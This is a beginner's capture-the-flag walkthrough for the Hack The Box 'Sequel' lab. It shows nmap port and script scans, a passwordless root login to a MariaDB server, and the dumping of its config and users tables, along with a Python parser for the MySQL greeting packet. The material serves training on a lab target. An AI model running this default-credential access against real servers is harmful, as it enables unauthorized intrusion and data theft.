The aim of this walkthrough is to provide help with the Sequel machine on the Hack The Box website. Please note that no flags are directly provided here. Moreover, be aware that this is only one of the many ways to solve the challenges.
It belongs to a series of tutorials that aim to help out complete beginners with finishing the Starting Point TIER 1 challenges.
SETUP
There are a couple of ways to connect to the target machine. The one we will be using throughout this walkthrough is via the provided pwnbox.
Once our connection is taken care of, we spawn the target machine.
Additionally - even though not required - it is possible to set a local variable (only available in the current shell) containing our target host’s IP address. Once set, we can easily access it by prepending a $ to our variable name.
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $rhost=<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $ echo $rhost
<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
You could use the unset command to remove it after you no longer need it.
┌─[✗]─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $unset rhost
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
TASK 1
Question: During our scan, which port do we find serving MySQL?
Let’s start our recon with an all-port nmap scan. Use the -T5 option to set the timing template to the fastest one.
┌─[htb-bluewalle@htb-nn4sxa7ryy]─[~/Desktop]
└──╼ $nmap -p- -T5 $rhost
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-05 20:46 BST
Warning: 10.129.17.29 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.129.17.29
Host is up (0.037s latency).
Not shown: 62285 closed tcp ports (conn-refused), 3249 filtered tcp ports (no-response)
PORT STATE SERVICE
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 69.04 seconds
┌─[htb-bluewalle@htb-nn4sxa7ryy]─[~/Desktop]
└──╼ $
3306
TASK 2
Question: What community-developed MySQL version is the target running?
Well, running nmap with the -sV option to detect the service and its version does not help us here (the program hangs).
┌─[htb-bluewalle@htb-nn4sxa7ryy]─[~/Desktop]
└──╼ $nmap -p 3306 -sV $rhost -vvv
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-05 21:02 BST
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 21:02
Scanning 10.129.17.29 [2 ports]
Completed Ping Scan at 21:02, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:02
Completed Parallel DNS resolution of 1 host. at 21:02, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 21:02
Scanning 10.129.17.29 [1 port]
Discovered open port 3306/tcp on 10.129.17.29
Completed Connect Scan at 21:02, 0.01s elapsed (1 total ports)
Initiating Service scan at 21:02
Scanning 1 service on 10.129.17.29
...
We try again, but this time we only run scripts from the safe category (--script=safe option).
┌─[htb-bluewalle@htb-nn4sxa7ryy]─[~/Desktop]
└──╼ $nmap -p 3306 --script=safe $rhost
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-05 21:13 BST
Pre-scan script results:
|_http-robtex-shared-ns: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
| targets-asn:
|_ targets-asn.asn is a mandatory parameter
|_broadcast-wpad-discover: Failed to retrieve wpad.dat (http://wpad.com/wpad.dat) from server
|_hostmap-robtex: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
Nmap scan report for 10.129.17.29
Host is up (0.013s latency).
PORT STATE SERVICE
3306/tcp open mysql
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
| Thread ID: 124
| Capabilities flags: 63486
| Some Capabilities: IgnoreSpaceBeforeParenthesis, InteractiveClient, LongColumnFlag, Speaks41ProtocolOld, DontAllowDatabaseTableColumn, ConnectWithDatabase, IgnoreSigpipes, Support41Auth, Speaks41ProtocolNew, SupportsLoadDataLocal, ODBCClient, SupportsTransactions, SupportsCompression, FoundRows, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: zP_k{KAG}dYsW;_L>1{<
|_ Auth Plugin Name: mysql_native_password
Host script results:
| port-states:
| tcp:
|_ open: 3306
| unusual-port:
|_ WARNING: this script depends on Nmap's service/version detection (-sV)
| dns-blacklist:
| SPAM
|_ l2.apews.org - FAIL
|_fcrdns: FAIL (No PTR record)
Post-scan script results:
| reverse-index:
|_ 3306/tcp: 10.129.17.29
Nmap done: 1 IP address (1 host up) scanned in 112.12 seconds
┌─[htb-bluewalle@htb-nn4sxa7ryy]─[~/Desktop]
└──╼ $
MariaDB
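As an added illustration for Task 2 (not part of the original walkthrough), the Python below decodes the protocol-10 server greeting that nmap's mysql-info script reads, using a packet constructed inline from the values nmap printed above rather than a capture from the box. The "5.5.5-" prefix is MariaDB's compatibility prefix, so the real server is the 10.3.27-MariaDB part, and decoding the capability bits also shows that the server never advertised SSL, which is the first thing a defender would want to know about a database port reachable over the network.

```python
import struct

CAPABILITIES = {  # bits as nmap's mysql-info names them (MySQL CLIENT_* constants)
    1: "LongPassword", 2: "FoundRows", 4: "LongColumnFlag", 8: "ConnectWithDatabase",
    16: "DontAllowDatabaseTableColumn", 32: "SupportsCompression", 64: "ODBCClient",
    128: "SupportsLoadDataLocal", 256: "IgnoreSpaceBeforeParenthesis",
    512: "Speaks41ProtocolNew", 1024: "InteractiveClient", 2048: "SwitchToSSLAfterHandshake",
    4096: "IgnoreSigpipes", 8192: "SupportsTransactions", 16384: "Speaks41ProtocolOld",
    32768: "Support41Auth", 1 << 16: "SupportsMultipleStatments",
    1 << 17: "SupportsMultipleResults", 1 << 19: "SupportsAuthPlugins",
}
CLIENT_SSL, CLIENT_SECURE_CONNECTION, CLIENT_PLUGIN_AUTH = 2048, 32768, 1 << 19

def parse_handshake(packet: bytes) -> dict:
    """Decode a MySQL/MariaDB protocol-10 server greeting (the packet mysql-info reads)."""
    length = int.from_bytes(packet[0:3], "little")     # 3-byte length + 1-byte sequence id
    p = packet[4:4 + length]
    if p[0] != 10:
        raise ValueError(f"unsupported protocol version {p[0]}")
    end = p.index(b"\x00", 1)
    version = p[1:end].decode()                        # "5.5.5-" is MariaDB's compat prefix
    # thread id, salt part 1, filler, caps low, charset, status, caps high, plugin-data len, 10 reserved
    fixed = "<I8sxHBHHB10x"
    thread_id, salt, cap_low, _charset, status, cap_high, auth_len = struct.unpack_from(fixed, p, end + 1)
    pos = end + 1 + struct.calcsize(fixed)
    caps = cap_low | (cap_high << 16)
    if caps & CLIENT_SECURE_CONNECTION:                # salt part 2, NUL-terminated
        part2 = max(13, auth_len - 8)
        salt += p[pos:pos + part2].rstrip(b"\x00")
        pos += part2
    plugin = p[pos:p.index(b"\x00", pos)].decode() if caps & CLIENT_PLUGIN_AUTH else ""
    return {"version": version, "thread_id": thread_id, "capabilities": cap_low,
            "capability_names": [n for b, n in CAPABILITIES.items() if caps & b],
            "autocommit": bool(status & 2), "salt": salt.decode(), "auth_plugin": plugin,
            "tls_offered": bool(caps & CLIENT_SSL)}    # no SSL bit: the session is cleartext

def build_greeting(version: str, thread_id: int, salt: bytes, caps: int, plugin: str) -> bytes:
    """Constructed sample greeting (not a capture) using the values nmap reported above."""
    body = bytes([10]) + version.encode() + b"\x00" + struct.pack("<I", thread_id) + salt[:8] + b"\x00"
    body += struct.pack("<HBHH", caps & 0xFFFF, 8, 2, caps >> 16) + bytes([len(salt) + 1])
    body += b"\x00" * 10 + salt[8:] + b"\x00" + plugin.encode() + b"\x00"
    return len(body).to_bytes(3, "little") + b"\x00" + body

SAMPLE = build_greeting("5.5.5-10.3.27-MariaDB-0+deb10u1", 124, b"zP_k{KAG}dYsW;_L>1{<",
                        63486 | 0xB0000, "mysql_native_password")

if __name__ == "__main__":
    print(parse_handshake(SAMPLE))
```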
TASK 3
Question: When using the MySQL command line client, what switch do we need to use in order to specify a login username?
Using the program’s built-in help can help us identify the correct option to use.
┌─[htb-bluewalle@htb-nn4sxa7ryy]─[~/Desktop]
└──╼ $mysql --help
mysql Ver 15.1 Distrib 10.5.19-MariaDB, for debian-linux-gnu (x86_64) using EditLine wrapper
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Usage: mysql [OPTIONS] [database]
...
-u, --user=name User for login if not current user.
...
┌─[htb-bluewalle@htb-nn4sxa7ryy]─[~/Desktop]
└──╼ $
-u
TASK 4
Question: Which username allows us to log into this MariaDB instance without providing a password?
Why not try some default credentials?
┌─[htb-bluewalle@htb-nn4sxa7ryy]─[~/Desktop]
└──╼ $mysql -h $rhost -u root
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 147
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
root
TASK 5
Question: In SQL, what symbol can we use to specify within the query that we want to display everything inside a table?
Reading up a bit on SQL should provide you with the desired answer.
*
TASK 6
Question: In SQL, what symbol do we need to end each query with?
It is literally displayed by the MariaDB welcome message.
;
TASK 7
Question: There are three databases in this MySQL instance that are common across all MySQL instances. What is the name of the fourth that’s unique to this host?
Use the show command to list out all the available databases.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| htb |
| information_schema |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.014 sec)
MariaDB [(none)]>
From these, the only one that particularly stands out is the htb database.
htb
SUBMIT FLAG
Question: Submit root flag
Try and dump the contents of the htb database. One way to do this is to first select the htb database and then list all its tables.
MariaDB [(none)]> use htb
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [htb]> show tables;
+---------------+
| Tables_in_htb |
+---------------+
| config |
| users |
+---------------+
2 rows in set (0.011 sec)
MariaDB [htb]>
Dump all the data in the tables. Use the information obtained in the previous tasks to solve this.
| useful information | task   |
|--------------------|--------|
| usage of *         | TASK 5 |
| usage of ;         | TASK 6 |
| targeted database  | TASK 7 |
The only missing piece of information is the select statement, which we can easily look up online.
MariaDB [htb]> select * from config;
+----+-----------------------+----------------------------------+
| id | name | value |
+----+-----------------------+----------------------------------+
| 1 | timeout | 60s |
| 2 | security | default |
| 3 | auto_logon | false |
| 4 | max_size | 2M |
| 5 | flag | <flag> |
| 6 | enable_uploads | false |
| 7 | authentication_method | radius |
+----+-----------------------+----------------------------------+
7 rows in set (0.012 sec)
MariaDB [htb]> select * from users;
+----+----------+------------------+
| id | username | email |
+----+----------+------------------+
| 1 | admin | admin@sequel.htb |
| 2 | lara | lara@sequel.htb |
| 3 | sam | sam@sequel.htb |
| 4 | mary | mary@sequel.htb |
+----+----------+------------------+
4 rows in set (0.012 sec)
MariaDB [htb]>
The flag is in the config table.
flag
Make sure to terminate the target box before you continue with the next machine!